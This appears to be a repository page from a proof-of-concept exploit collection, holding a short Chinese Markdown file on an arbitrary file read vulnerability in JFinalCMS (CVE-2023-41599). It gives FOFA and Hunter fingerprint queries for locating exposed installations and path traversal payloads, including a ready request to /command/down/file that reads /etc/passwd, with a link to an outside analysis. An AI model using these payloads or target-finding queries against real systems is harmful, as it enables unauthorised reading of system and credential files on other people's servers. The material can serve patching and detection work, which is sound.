admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md

24 lines
403 B
Markdown
Raw Blame History

## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
## 特征
```fofa:
body="content=\"JreCms"
hunter:
web.body="content=\"JreCms"
```
## POC
```
Windows: /../../../../../../../../../test.txt
Linux: /../../../../../../../../../etc/passwd
/command/down/file?filekey=/../../../../../../../../../etc/passwd
```
## 漏洞分析
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/
Reference in New Issue View Git Blame Copy Permalink